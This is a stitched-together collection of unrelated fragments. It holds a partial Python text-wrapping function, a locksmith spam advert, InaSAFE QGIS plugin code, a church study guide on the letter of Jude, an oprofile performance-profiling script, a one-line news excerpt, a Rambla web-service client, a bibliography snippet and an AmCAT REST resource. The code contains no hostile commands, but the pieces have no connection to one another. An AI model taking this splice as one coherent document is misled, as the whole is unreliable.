        # space) on this line, then recurse on the stripped remainder.
        return (text[:lineLength + 1] + '\n'
                + insertNewlines(text[lineLength + 1:].lstrip(), lineLength))
    # Otherwise break at the first space at or after column
    # lineLength - 1, letting the current word finish its line.
    cut = text.find(' ', lineLength - 1)
    if cut == -1:
        # No further spaces: the tail cannot be wrapped.
        return text
    return text[:cut] + '\n' + insertNewlines(text[cut:].lstrip(), lineLength)

print(insertNewlines('Random text to wrap again.', 5))
print()
print(insertNewlines('While I expect new intellectual adventures ahead, nothing will compare to the exhilaration of the world-changing accomplishments that we produced together.', 15))
print()
print(insertNewlines('Nuh-uh! We let users vote on comments and display them by number of votes. Everyone knows that makes it impossible for a few persistent voices to dominate the discussion.', 20))
24-Hour Locksmith in 11356, New York. Need a locksmith in 11356, New York? Call us any time, 24 hours a day, to get the best price! 10% off today – 25 April 2019!
""" InaSAFE Disaster risk assessment tool developed by AusAid - **QGIS plugin implementation.** Contact : ole.moller.nielsen@gmail.com .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ from safe.impact_functions.earthquake.earthquake_building_impact import LOGGER __author__ = 'tim@linfiniti.com' __revision__ = '$Format:%H$' __date__ = '10/01/2011' __copyright__ = 'Copyright 2012, Australia Indonesia Facility for ' __copyright__ += 'Disaster Reduction' import os # Import the PyQt and QGIS libraries from PyQt4.QtCore import (QObject, QLocale, QTranslator, SIGNAL, QCoreApplication, Qt, QSettings, QVariant) from PyQt4.QtGui import QAction, QIcon, QApplication, QMessageBox try: # When upgrading, using the plugin manager, you may get an error when # doing the following import, so we wrap it in a try except # block and then display a friendly message to restart QGIS from safe_qgis.exceptions import TranslationLoadError except ImportError: # Note these strings cant be translated. QMessageBox.warning(None, 'InaSAFE', 'Please restart QGIS to use this plugin.') import utilities class Plugin: """The QGIS interface implementation for the Risk in a box plugin. This class acts as the 'glue' between QGIS and our custom logic. It creates a toolbar and menubar entry and launches the InaSAFE user interface if these are activated. """ def __init__(self, iface): """Class constructor. On instantiation, the plugin instance will be assigned a copy of the QGIS iface object which will allow this plugin to access and manipulate the running QGIS instance that spawned it. Args: iface - a Quantum GIS QGisAppInterface instance. This instance is automatically passed to the plugin by QGIS when it loads the plugin. Returns: None. Raises: no exceptions explicitly raised. 
""" # Save reference to the QGIS interface self.iface = iface self.translator = None self.setupI18n() #print self.tr('InaSAFE') utilities.setupLogger() #noinspection PyArgumentList def setupI18n(self, thePreferredLocale=None): """Setup internationalisation for the plugin. See if QGIS wants to override the system locale and then see if we can get a valid translation file for whatever locale is effectively being used. Args: thePreferredLocale - optional parameter which if set will override any other way of determining locale.. Returns: None. Raises: TranslationLoadException """ myOverrideFlag = QSettings().value('locale/overrideFlag', QVariant(False)).toBool() if thePreferredLocale is not None: myLocaleName = thePreferredLocale elif myOverrideFlag: myLocaleName = QSettings().value('locale/userLocale', QVariant('')).toString() else: myLocaleName = QLocale.system().name() # NOTES: we split the locale name because we need the first two # character i.e. 'id', 'af, etc myLocaleName = str(myLocaleName).split('_')[0] # Also set the system locale to the user overridden local # so that the inasafe library functions gettext will work # .. see:: :py:func:`common.utilities` os.environ['LANG'] = str(myLocaleName) LOGGER.debug('%s %s %s %s' % (thePreferredLocale , myOverrideFlag, QLocale.system().name(), os.environ['LANG'])) myRoot = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) myTranslationPath = os.path.join(myRoot, 'safe_qgis', 'i18n', 'inasafe_' + str(myLocaleName) + '.qm') if os.path.exists(myTranslationPath): self.translator = QTranslator() myResult = self.translator.load(myTranslationPath) if not myResult: myMessage = 'Failed to load translation for %s' % myLocaleName raise TranslationLoadError(myMessage) QCoreApplication.installTranslator(self.translator) LOGGER.debug('%s %s' % (myTranslationPath, os.path.exists(myTranslationPath))) def tr(self, theString): """We implement this ourself since we do not inherit QObject. 
Args: theString - string for translation. Returns: Translated version of theString. Raises: no exceptions explicitly raised. """ return QCoreApplication.translate('Plugin', theString) #noinspection PyCallByClass def initGui(self): """Gui initialisation procedure (for QGIS plugin api). This method is called by QGIS and should be used to set up any graphical user interface elements that should appear in QGIS by default (i.e. before the user performs any explicit action with the plugin). Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # Import dock here as it needs to be imported AFTER i18n is set up from safe_qgis.dock import Dock self.dockWidget = None #-------------------------------------- # Create action for plugin dockable window (show/hide) #-------------------------------------- # pylint: disable=W0201 self.actionDock = QAction(QIcon(':/plugins/inasafe/icon.png'), self.tr('Toggle InaSAFE Dock'), self.iface.mainWindow()) self.actionDock.setObjectName('InaSAFEDockToggle') self.actionDock.setStatusTip(self.tr( 'Show/hide InaSAFE dock widget')) self.actionDock.setWhatsThis(self.tr( 'Show/hide InaSAFE dock widget')) self.actionDock.setCheckable(True) self.actionDock.setChecked(True) QObject.connect(self.actionDock, SIGNAL('triggered()'), self.showHideDockWidget) # add to plugin toolbar self.iface.addToolBarIcon(self.actionDock) # add to plugin menu self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionDock) #-------------------------------------- # Create action for keywords editor #-------------------------------------- self.actionKeywordsDialog = QAction( QIcon(':/plugins/inasafe/keywords.png'), self.tr('InaSAFE Keyword Editor'), self.iface.mainWindow()) self.actionKeywordsDialog.setStatusTip(self.tr( 'Open InaSAFE keywords editor')) self.actionKeywordsDialog.setWhatsThis(self.tr( 'Open InaSAFE keywords editor')) self.actionKeywordsDialog.setEnabled(False) QObject.connect(self.actionKeywordsDialog, SIGNAL('triggered()'), 
self.showKeywordsEditor) self.iface.addToolBarIcon(self.actionKeywordsDialog) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionKeywordsDialog) #-------------------------------------- # Create action for reset icon #-------------------------------------- self.actionResetDock = QAction( QIcon(':/plugins/inasafe/reload.png'), self.tr('Reset Dock'), self.iface.mainWindow()) self.actionResetDock.setStatusTip(self.tr( 'Reset the InaSAFE Dock')) self.actionResetDock.setWhatsThis(self.tr( 'Reset the InaSAFE Dock')) QObject.connect(self.actionResetDock, SIGNAL('triggered()'), self.resetDock) self.iface.addToolBarIcon(self.actionResetDock) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionResetDock) #-------------------------------------- # Create action for options dialog #-------------------------------------- self.actionOptions = QAction( QIcon(':/plugins/inasafe/options.png'), self.tr('InaSAFE Options'), self.iface.mainWindow()) self.actionOptions.setStatusTip(self.tr( 'Open InaSAFE options dialog')) self.actionOptions.setWhatsThis(self.tr( 'Open InaSAFE options dialog')) QObject.connect(self.actionOptions, SIGNAL('triggered()'), self.showOptions) self.iface.addToolBarIcon(self.actionOptions) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionOptions) #-------------------------------------- # Create action for impact functions doc dialog #-------------------------------------- self.actionImpactFunctionsDoc = QAction( QIcon(':/plugins/inasafe/functions-table.png'), self.tr('InaSAFE Impact Functions Browser'), self.iface.mainWindow()) self.actionImpactFunctionsDoc.setStatusTip(self.tr( 'Open InaSAFE Impact Functions Browser')) self.actionImpactFunctionsDoc.setWhatsThis(self.tr( 'Open InaSAFE Impact Functions Browser')) QObject.connect(self.actionImpactFunctionsDoc, SIGNAL('triggered()'), self.showImpactFunctionsDoc) self.iface.addToolBarIcon(self.actionImpactFunctionsDoc) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionImpactFunctionsDoc) 
# Short cut for Open Impact Functions Doc self.keyAction = QAction("Test Plugin", self.iface.mainWindow()) self.iface.registerMainWindowAction(self.keyAction, "F7") QObject.connect(self.keyAction, SIGNAL("triggered()"), self.keyActionF7) #--------------------------------------- # Create action for minimum needs dialog #--------------------------------------- self.actionMinimumNeeds = QAction( QIcon(':/plugins/inasafe/minimum_needs.png'), self.tr('InaSAFE Minimum Needs Tool'), self.iface.mainWindow()) self.actionMinimumNeeds.setStatusTip(self.tr( 'Open InaSAFE minimum needs tool')) self.actionMinimumNeeds.setWhatsThis(self.tr( 'Open InaSAFE minimum needs tool')) QObject.connect(self.actionMinimumNeeds, SIGNAL('triggered()'), self.showMinimumNeeds) self.iface.addToolBarIcon(self.actionMinimumNeeds) self.iface.addPluginToMenu(self.tr('InaSAFE'), self.actionMinimumNeeds) #-------------------------------------- # create dockwidget and tabify it with the legend #-------------------------------------- self.dockWidget = Dock(self.iface) self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockWidget) myLegendTab = self.iface.mainWindow().findChild(QApplication, 'Legend') if myLegendTab: self.iface.mainWindow().tabifyDockWidget( myLegendTab, self.dockWidget) self.dockWidget.raise_() # # Hook up a slot for when the current layer is changed # QObject.connect(self.iface, SIGNAL("currentLayerChanged(QgsMapLayer*)"), self.layerChanged) # # Hook up a slot for when the dock is hidden using its close button # or view-panels # QObject.connect(self.dockWidget, SIGNAL("visibilityChanged (bool)"), self.toggleActionDock) # pylint: disable=W0201 def unload(self): """Gui breakdown procedure (for QGIS plugin api). This method is called by QGIS and should be used to *remove* any graphical user interface elements that should appear in QGIS. Args: None. Returns: None. Raises: no exceptions explicitly raised. 
""" # Remove the plugin menu item and icon self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionDock) self.iface.removeToolBarIcon(self.actionDock) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionKeywordsDialog) self.iface.removeToolBarIcon(self.actionKeywordsDialog) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionResetDock) self.iface.removeToolBarIcon(self.actionResetDock) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionOptions) self.iface.removeToolBarIcon(self.actionOptions) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionMinimumNeeds) self.iface.removeToolBarIcon(self.actionMinimumNeeds) self.iface.removePluginMenu(self.tr('InaSAFE'), self.actionImpactFunctionsDoc) self.iface.removeToolBarIcon(self.actionImpactFunctionsDoc) self.iface.mainWindow().removeDockWidget(self.dockWidget) self.dockWidget.setVisible(False) self.dockWidget.destroy() QObject.disconnect(self.iface, SIGNAL("currentLayerChanged(QgsMapLayer*)"), self.layerChanged) def toggleActionDock(self, checked): """check or uncheck the toggle inaSAFE toolbar button. This slot is called when the user hides the inaSAFE panel using its close button or using view->panels .. see also:: :func:`Plugin.initGui`. Args: checked - if actionDock has to be checked or not Returns: None. Raises: no exceptions explicitly raised. """ self.actionDock.setChecked(checked) # Run method that performs all the real work def showHideDockWidget(self): """Show or hide the dock widget. This slot is called when the user clicks the toolbar icon or menu item associated with this plugin. It will hide or show the dock depending on its current state. .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ if self.dockWidget.isVisible(): self.dockWidget.setVisible(False) else: self.dockWidget.setVisible(True) self.dockWidget.raise_() def showMinimumNeeds(self): """Show the minimum needs dialog. 
This slot is called when the user clicks the minimum needs toolbar icon or menu item associated with this plugin. .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.minimum_needs import MinimumNeeds myDialog = MinimumNeeds(self.iface.mainWindow()) myDialog.show() def showOptions(self): """Show the options dialog. This slot is called when the user clicks the options toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.options_dialog import OptionsDialog myDialog = OptionsDialog(self.iface.mainWindow(), self.iface, self.dockWidget) myDialog.show() def showKeywordsEditor(self): """Show the keywords editor. This slot is called when the user clicks the keyword editor toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.keywords_dialog import KeywordsDialog if self.iface.activeLayer() is None: return myDialog = KeywordsDialog(self.iface.mainWindow(), self.iface, self.dockWidget) myDialog.setModal(True) myDialog.show() def showImpactFunctionsDoc(self): """Show the keywords editor. This slot is called when the user clicks the impact functions toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ # import here only so that it is AFTER i18n set up from safe_qgis.impact_functions_doc import ImpactFunctionsDoc myDialog = ImpactFunctionsDoc(self.iface.mainWindow()) myDialog.show() def resetDock(self): """Reset the dock to its default state. 
This slot is called when the user clicks the reset icon in the toolbar or the reset menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ self.dockWidget.getLayers() def layerChanged(self, theLayer): """Enable or disable the keywords editor icon. This slot is called when the user clicks the keyword editor toolbar icon or menu item associated with this plugin .. see also:: :func:`Plugin.initGui`. Args: None. Returns: None. Raises: no exceptions explicitly raised. """ if theLayer is None: self.actionKeywordsDialog.setEnabled(False) else: self.actionKeywordsDialog.setEnabled(True) self.dockWidget.layerChanged(theLayer) def keyActionF7(self): '''Executed when user press F7''' self.showImpactFunctionsDoc()
Beloved, although I was very eager to write to you about our common salvation, I found it necessary to write appealing to you to contend for the faith that was once for all delivered to the saints. For certain people have crept in unnoticed who long ago were designated for this condemnation, ungodly people, who pervert the grace of our God into sensuality and deny our only Master and Lord, Jesus Christ. Now I want to remind you, although you once fully knew it, that Jesus, who saved a people out of the land of Egypt, afterward destroyed those who did not believe. And the angels who did not stay within their own position of authority, but left their proper dwelling, he has kept in eternal chains under gloomy darkness until the judgment of the great day— just as Sodom and Gomorrah and the surrounding cities, which likewise indulged in sexual immorality and pursued unnatural desire, serve as an example by undergoing a punishment of eternal fire. Main point: To whose authority do we listen or submit: our own or Jesus'? 1. What situation is Jude addressing in his letter? 2. Share a time when someone called you out, rebuked you or held you accountable. 3. Jude uses a well-known illustration from extrabiblical literature about Michael rebuking Satan. By whose authority did Michael rebuke Satan? What do we learn from this example about how we are to rebuke? 4. In what areas of life should Jesus be our final authority? How does he communicate that authority today (Heb 1:1-2; John 10:35; Matthew 5:17-19; 12:38-42; 19:4-5)? 5. List the authorities in your life. Where do you place yourself in that list? How do these authorities help you make practical decisions (at work, with finances, in spiritual life)? 6. Like the wolves' blood-frozen blade story that Scott mentioned in his sermon, many of our authorities are deceptive. How can you lead your family and friends to learn that Jesus' authority is good and not self-destructive?
Personal Response: Pray through the benediction in Jude 23-25. Commit it to memory between now and the next time your community group meets. Consider memorizing it as a family.
import re
import subprocess
import socket
import calibration_data_generator as cdg
import output_processing as op
import datetime


def run_the_function(print_result, height, width, repeat, text_file_name, grain_size):
    """Profile one run of the cppProcessing2.0 binary with oprofile.

    The binary is executed under /usr/bin/time and operf, the resulting
    opreport output is parsed, and per-function metrics (bandwidth, CPI,
    cache miss rates, ...) are accumulated.  When ``print_result`` is True
    a human-readable report is printed to stdout.

    :param print_result: print the full report if True.
    :param height: image height in pixels, forwarded to the binary.
    :param width: image width in pixels, forwarded to the binary.
    :param repeat: number of sample/reset iterations the binary performs.
    :param text_file_name: calibration parameter file given to the binary.
    :param grain_size: parallel grain size argument for the binary.
    :return: throughput, image_size * 2 * repeat / total_processing_time.
    """
    # NOTE(review): path_name and top_level_data_set_name are assigned but
    # never used below — presumably they document the input data set; confirm.
    path_name = "./data/KnifeQuadBPos1_2_21_int16.h5"
    top_level_data_set_name = "KnifeQuadBPos1/"
    host_name = socket.gethostname()

    # Program to execute (several build flavours; only parallel_profile is used).
    debug_version = './Debug/cppProcessing2.0 '
    profile_version = './Profiling/cppProcessing2.0 '
    parallel_debug = './parallel_debug/cppProcessing2.0 '
    parallel_profile = './parallel_profile/cppProcessing2.0 '
    cmdl_arg = '1 ' + str(width) + ' ' + str(height) + ' ' + str(repeat) + ' ' + text_file_name + ' ' + str(grain_size) + ' 1'
    program_to_execute = parallel_profile + cmdl_arg

    # events to monitor
    # instructions
    event1 = op.oprofile_events('CPU_CLK_UNHALTED', '0x00', 100000000)
    event2 = op.oprofile_events('INST_RETIRED', '0x00', 60000000)
    # cache misses
    event3 = op.oprofile_events('LLC_MISSES', '0x41', 60000)  # divide by LLC_REFS
#     event4 = op.oprofile_events('l2_lines_in','0x07',1000000) #100000
#     event5 = op.oprofile_events('br_inst_retired', '0x01', 400000) #total branch instructions retired
#     event6 = op.oprofile_events('br_misp_retired', '0x01', 400000) #total mispredicted branches. Divide by br_inst_retired
    event6 = op.oprofile_events('mem_trans_retired', '0x02', 2000000)
#     event7 = op.oprofile_events('uops_retired', 'stall_cycles',2000000) #no of stall cycles. Divide by cpu cycles
# #     event8 = op.oprofile_events('dtlb_load_misses', '0x01',2000000)
# #     event8 = op.oprofile_events('dtlb_load_misses', '0x81',1000) #Ivy Bridge
# #     event9 = op.oprofile_events('LLC_REFS', '0x4f',6000)
# #     event10 = op.oprofile_events('l1d_pend_miss', 'pending',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
#     event11 = op.oprofile_events('resource_stalls', '0x01',2000000) #no of stall cycles/divide by number of instructions
#     event12 = op.oprofile_events('l1d', '0x01',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
    list_of_events = [event1, event2, event3, event6]  # , event7, event8, event9, event10, event11, event12]

    # variable initialisation
    dict_of_attributes = {}
    total_time = 0.0
    dict_of_function_perc_time = {}
    list_of_events_recorded = []
    image_size = width * height * 2  # memory size; int16 pixels -> 2 bytes each
    total_processing_time = 0.0
    operf_events = op.get_operf_option(list_of_events)
    result_directory = './oprof_reports/' + host_name + '/'
    report_destination = result_directory + 'profile_report.txt'
    sample_data_destination = result_directory + 'oprof_data/'

    # commandline options
    cmd_git = 'git rev-parse HEAD > ' + report_destination
    cmd_time = '(/usr/bin/time -v ' + program_to_execute + ') &>> ' + report_destination
    cmd_operf = 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' ' + program_to_execute
    cmd_opreport = 'opreport --symbols --session-dir=' + sample_data_destination + ' >> ' + report_destination
    cmd_mkdir = 'mkdir -p ' + sample_data_destination
    cmd_annotate = 'opannotate -s --output-dir=' + result_directory + 'annotated/ ' + '--session-dir=' + sample_data_destination + ' ' + program_to_execute

    # NOTE(review): cmd_mkdir is invoked after cmd_operf has already written
    # into the sample directory — confirm the ordering is intentional.
    op.cmd_call(cmd_git)
    op.cmd_call(cmd_time)
    op.cmd_call(cmd_operf)
    op.cmd_call(cmd_opreport)
    op.cmd_call(cmd_mkdir)
    op.cmd_call(cmd_annotate)

    # First pass: collect the function names listed in the opreport output.
    f = open(report_destination, 'r')
    list_of_functions = op.get_function_list(f)
    f.close()
    for function_name in list_of_functions:
        dict_of_function_perc_time[function_name] = 0
        dict_of_attributes[function_name] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]

    # Second pass: accumulate per-function sample percentages per event.
    f = open(report_destination, 'r')
    s = f.readline()
    commit_key = s;  # the first line is the git commit hash written by cmd_git
    while s != '':
        if 'Counted' in s:
            # opreport header line naming an event that was actually recorded
            for event in list_of_events:
                if (event.event_name + ' events') in s:
                    list_of_events_recorded.append(event)
        if 'Elapsed (wall clock) time ' in s:
            total_time = op.parse_time(s)
        for function_name in list_of_functions:
            if function_name in s:
                delimited = s.split(' ')
                parsed = [item for item in delimited if item != '']
                attributes = []
                dict_of_function_perc_time[function_name] = float(parsed[1]) + dict_of_function_perc_time[function_name]
                for index in xrange(len(list_of_events_recorded)):
                    # manually add the percentage clock cycles
                    attributes.append(float(parsed[index * 2]) + dict_of_attributes[function_name][index])
                dict_of_attributes[function_name] = attributes
        s = f.readline()

    # Derive the per-function metrics from the raw event percentages.
    llc_misses_per_instruction = op.get_llc_misses(list_of_functions, dict_of_attributes, list_of_events_recorded)
    CPI = op.get_CPI(list_of_functions, dict_of_attributes, list_of_events_recorded)
    bandwidth = op.get_bandwidth(list_of_functions, dict_of_function_perc_time, total_time, image_size, repeat)
    function_time = op.get_time(list_of_functions, dict_of_function_perc_time, total_time, repeat)
    l1d_miss_rate = op.get_L1D_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    DTLB_miss_rate = op.get_DTLB_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    LLC_miss_rate = op.get_LLC_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    br_misspre_rate = op.get_br_mispre_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    resource_stall = op.get_resource_stall_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    l2_miss_rate = op.get_L2_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    l1d_repl_rate = op.get_L1D_repl_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
    memory_bandwidth = op.get_memory_bandwidth(list_of_functions, dict_of_attributes, list_of_events_recorded)

    # total_time appears to be in ms and perc_time in percent, hence /1000 /100.
    for name, perc_time in dict_of_function_perc_time.iteritems():
        total_processing_time = total_processing_time + perc_time * total_time / 1000 / 100  # in seconds

    # printing reports
    if print_result == True:
        print
        print datetime.datetime.now().date(),
        print datetime.datetime.now().time(),
        print 'Report:'
        print cmd_time
        print cmd_operf
        print cmd_opreport
        print 'oprofile sample directory: ' + sample_data_destination
        print cmd_annotate
        print '=' * 100
        print commit_key,
        print 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' ' + program_to_execute
        print 'The program took {0:.4} ms in total. {1:.4} ms per sample/reset pair.'.format(total_time, total_time/repeat)
        print 'Of which the processing functions took in total {0:.4} ms to run.'.format(total_processing_time)
        print 'Image size {0:d} ({1:d} * {2:d}) pixels.'.format(width * height, height, width),
        print op.get_bytes(image_size)
        print 'Statistics collected for ' + str(repeat) + ' iterations'
        print 'Bandwidth:'
        print '\t' + 'Total: {0:.4} MB/s'.format(op.get_bytes(image_size * 2 * repeat/total_processing_time))  # 2 because of sample and reset
        for function in list_of_functions:
            index = list_of_functions.index(function)
            print '\t' + function + ':' + '{0}'.format(op.get_bytes((bandwidth[index]))) + '/s'
        print 'LLC misses per instruction:'
        for function in list_of_functions:
            index = list_of_functions.index(function)
            print '\t' + function + ':' + '{0:.2%}'.format(llc_misses_per_instruction[index])
        print 'Cycle per instruction (CPI):'
        for function in list_of_functions:
            index = list_of_functions.index(function)
            print '\t' + function + ':' + '{0:.2}'.format(CPI[index])
        print 'Processing time (ms) for each call:'
        for function in list_of_functions:
            index = list_of_functions.index(function)
            print '\t' + function + ':' + '{0}'.format(int(function_time[index]))
        # Each optional metric list is empty when its event was not recorded.
        if len(l1d_miss_rate) != 0:
            print 'L1D misses percentage:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(l1d_miss_rate[index])
        if len(l1d_repl_rate) != 0:
            print 'L1D replacement rate:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(l1d_repl_rate[index])
        if len(l2_miss_rate) != 0:
            print 'L2 misses percentage:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(l2_miss_rate[index])
        if len(DTLB_miss_rate) != 0:
            print 'DTLB miss per instruction:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2}'.format(DTLB_miss_rate[index])
        if len(LLC_miss_rate) != 0:
            print 'LLC miss rate:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(LLC_miss_rate[index])
        if len(br_misspre_rate) != 0:
            print 'Branch misprediction percentage:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(br_misspre_rate[index])
        if len(resource_stall) != 0:
            print 'Resource stall cycle percentage:'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + '{0:.2%}'.format(resource_stall[index])
        if len(memory_bandwidth) != 0:
            print 'Memory Bandwidth'
            for function in list_of_functions:
                index = list_of_functions.index(function)
                print '\t' + function + ':' + op.get_bytes(memory_bandwidth[index])
        print '=' * 100

    return image_size * 2 * repeat/total_processing_time


# --- module-level experiment driver (runs on import) ---
repeat = 100  # 350 is about the maximum
# width_arr = [2000, 5000, 10000, 20000, 50000, 100000, 500000]
height = 3717
width = 3528
host_name = socket.gethostname()
calib_directory = './calibration_data/'
path_name = calib_directory + host_name + '/'
text_file_name = path_name + 'test_param_file.txt'
grain_size_file_name = './oprof_reports/' + host_name + '/' + 'grain_size_test.txt'
print grain_size_file_name
# subprocess.call('mkdir -p ' + path_name, shell=True)
# cdg.generate_calib_files(height, width, text_file_name, path_name)
# cmd_rm_file = "rm -f " + grain_size_file_name
# cmd_create_file = "touch "+ grain_size_file_name
# op.cmd_call(cmd_rm_file)
# op.cmd_call(cmd_create_file)
grain_size = 3528 * 2
run_the_function(True, height, width, repeat, text_file_name, grain_size)
# 1,3,7,9,21, 59,63,177,413,531,
# * 1239,3717
# for grain_size in (3528, 3528/2,3528/3,3528/4,3528/6,3528/7, 3528*3, 3528*7,3528*9, 3528*21, 3528*59, 3528*63, 3528*177,3528*413,3528*531,3528*1239):
#     a = op.accumulator(grain_size_file_name, grain_size, 2)
#     for repeats in xrange(1,2):
#         bandwidth = run_the_function(True, height, width, repeat, text_file_name, grain_size)
#         a.add_number(bandwidth)
#         print grain_size, op.get_bytes(bandwidth)
#     a.average()
#
# print 'starting'
# grain_size = 20
# run_the_function(True, height, width, repeat, text_file_name, grain_size)
# for index in xrange(9, 41):
#     run_the_function(True, height, width, repeat, text_file_name, index)
#     print index
# for grain_size in xrange(10000,1000000,2000):
#     a = op.accumulator(grain_size_file_name, grain_size, 9)
#     for repeats in xrange(1,9):
#         bandwidth = run_the_function(False, height, width, repeat, text_file_name, grain_size)
#         a.add_number(bandwidth[0])
#         print grain_size, op.get_bytes(bandwidth[0])
#     a.average()
#
#
# width = 50000
# repeat_arr = [1,2,5,10,20,50,100]
# for repeat in repeat_arr:
#     run_the_function(True, width, repeat)
# operf -e CPU_CLK_UNHALTED=100000:0:1:1,mem_load_uops_llc_hit_retired=100000:2:1:1,mem_load_uops_llc_hit_retired=100000:4:1:1,mem_load_uops_retired=100000:4:1:1, ./Debug/cppProcessing2.0 0 ./data/KnifeQuadBPos1_2_21_int16.h5 KnifeQuadBPos1/ 500
This was despite Gable Holdings’ previous assertion that PwC had excluded it from the meeting, which it alleged at the time was “illegal”.
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright (C) 2012 rambla.eu # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.import os import json, os import raws_json from raws_json.raws_service import RawsService class RamsService(RawsService): def __init__(self, username, password, server=None, ssl = True): """ Constructor for RamsService, used to send request to the RATS service. :param username: Name of your Rambla user account :param password: Pwd of your Rambla user account :param server: Domain name of the RATS service (optional, default = "rams.enc01.rambla.be") :param ssl: Set True to use SSL (your account must be SSL enabled) (optional, default = False) """ self.username = username if server is None: server = "rams.mon01.rambla.be" super(RamsService, self).__init__(username = username, password = password, server = server, ssl = ssl) def delete(self, uri): """ Deletes any resource, given the uri. """ return self.Delete(uri = uri) def getTotal(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/total/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri) def getTraffic(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/traffic/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri) def getStorage(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/storage/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri)
1. The Europa world of learning. 3. Reports of the president and the treasurer. New York, John Simon Guggenheim Memorial Foundation.
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands)                     #
#                                                                         #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit     #
#                                                                         #
# AmCAT is free software: you can redistribute it and/or modify it under  #
# the terms of the GNU Affero General Public License as published by the  #
# Free Software Foundation, either version 3 of the License, or (at your  #
# option) any later version.                                              #
#                                                                         #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT    #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or   #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public     #
# License for more details.                                               #
#                                                                         #
# You should have received a copy of the GNU Affero General Public        #
# License along with AmCAT.  If not, see <http://www.gnu.org/licenses/>.  #
###########################################################################
from amcat.models import Codebook
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from api.rest.resources.amcatresource import AmCATResource
from django.conf.urls import url

import collections
import itertools

# Maximum number of codebooks that may be requested in a single hierarchy call.
MAX_CODEBOOKS = 5
# NOTE(review): CACHE_LABELS is not referenced anywhere in this file —
# possibly used elsewhere or dead; confirm before removing.
CACHE_LABELS = (2, 1)


def _walk(nodes):
    """Convert all TreeItems to dictionaries"""
    # Each node is a namedtuple-like TreeItem; _asdict() converts it and the
    # children are converted recursively and materialised as tuples.
    for node in nodes:
        node = node._asdict()
        node['children'] = tuple(_walk(node['children']))
        yield node


class CodebookHierarchyResource(AmCATResource):
    """
    This resource has no direct relationship to one model. Instead, it's
    composed of multiple codebooks. A thorough documentation of the design
    of these hierarchies is available on the AmCAT wiki:

    - https://code.google.com/p/amcat/wiki/Codebook

    Any filters applied to this resource translate directly to filters on
    codebooks. For example, you could request the hierarchy of codebook
    with id '5' using the following query:

    - /codebookhierarchy?id=5

    Two special filters can be applied to hierarchies:

    - include_missing_parents
    - include_hidden

    Each filter displayed above can either be true or false and do not
    rely on each other. Both default to true.
    """
